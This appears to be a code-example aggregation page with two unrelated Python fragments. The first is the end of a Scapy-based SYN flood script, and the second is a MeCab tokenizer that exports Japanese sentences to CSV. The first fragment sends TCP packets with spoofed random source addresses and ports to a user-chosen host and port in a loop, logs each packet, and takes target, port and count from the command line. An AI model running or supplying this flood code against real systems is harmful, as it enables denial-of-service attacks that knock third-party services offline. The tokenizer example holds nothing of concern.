示例#1
0
        # Combine the (presumably spoofed-source) IP header with the TCP
        # layer — Scapy's "/" operator stacks protocol layers into one packet.
        packets = ip_layer / tcp_layer

        # Transmit the packet; verbose=0 suppresses Scapy's per-send output.
        send(packets, verbose=0)
        sent_count += 1
        # Log the spoofed source address/port and the target for this packet.
        # NOTE(review): random_ip/random_port look like per-iteration spoofed
        # values built earlier in the loop — confirm against the missing header.
        stdout.writelines("Sending from " + random_ip + ":" +
                          str(random_port) + " -> " + destination_ip + ":" +
                          str(destination_port) + "\n")

    # After the send loop completes, report the total number of packets sent.
    stdout.writelines("Packets sent: %i\n" % sent_count)


if __name__ == "__main__":
    # Build the usage banner shown when argument validation fails.
    usage_cmd = 'Usage: \n'
    usage_cmd += ' ' + os.path.basename(__file__)
    usage_cmd += ' -h <destination_ip> -p <destination_port> -c <loop_count>'

    # Project-local ArgumentParser wrapping getopt-style option parsing.
    # Renamed from `raw_input`, which shadowed the Python 2 builtin of the
    # same name and read misleadingly.
    arg_parser = ArgumentParser(sys.argv[1:], usage_cmd)

    if not arg_parser.validate():
        arg_parser.print_usage()
        # sys.exit() is the reliable form inside scripts; the bare exit()
        # builtin is injected by the `site` module and is not guaranteed.
        sys.exit(2)

    # Parse & get argument values: target host, target port, and loop count.
    args = arg_parser.parse(["h", "p", "c"], ["host=", "port=", "count="])
    host = arg_parser.get_value_by_key("-h", args)
    port = arg_parser.get_value_by_key("-p", args)
    count = arg_parser.get_value_by_key("-c", args)

    SynFlood(host, int(port), int(count))
示例#2
0
    # MeCab morphological analyzer in ChaSen output mode.
    tokenizer = MeCabTokenizer(tagger='-Ochasen')
    output_arr = []
    # Japanese punctuation to drop from the token stream.
    stop_words = ['。', '、', '・']
    for sentence in sentence_arr:
        # parse_to_node yields a linked list of morpheme nodes; walk it via
        # the `.next` pointers below.
        tokens = tokenizer.parse_to_node(sentence)
        surface = []
        while tokens:
            # Skip empty surfaces (MeCab's BOS/EOS nodes have surface == "")
            # and the punctuation stop words.
            if tokens.surface and tokens.surface not in stop_words:
                surface.append(tokens.surface)
            tokens = tokens.next
        # Keep only sentences that produced at least one token; store the
        # original sentence alongside its space-joined surface forms.
        if len(surface) > 0:
            output_arr.append([sentence, " ".join(surface)])

    # Write [sentence, tokenized] rows out via the project CSV helper.
    csv_obj.export(csv_export_path, output_arr)


if __name__ == "__main__":
    # Build the usage banner shown when argument validation fails.
    usage_cmd = 'Usage: \n'
    usage_cmd += ' ' + os.path.basename(__file__)
    usage_cmd += ' -i <input_file> -e <export_file>'

    # Project-local ArgumentParser wrapping getopt-style option parsing.
    # Renamed from `raw_input`, which shadowed the Python 2 builtin of the
    # same name and read misleadingly.
    arg_parser = ArgumentParser(sys.argv[1:], usage_cmd)

    if not arg_parser.validate():
        arg_parser.print_usage()
        # sys.exit() is the reliable form inside scripts; the bare exit()
        # builtin is injected by the `site` module and is not guaranteed.
        sys.exit(2)

    # Parse & get argument values: input file to tokenize, export destination.
    args = arg_parser.parse(["i", "e"], ["import=", "export="])
    input_path = arg_parser.get_value_by_key("-i", args)
    export_path = arg_parser.get_value_by_key("-e", args)
    tokenizing(input_path, export_path)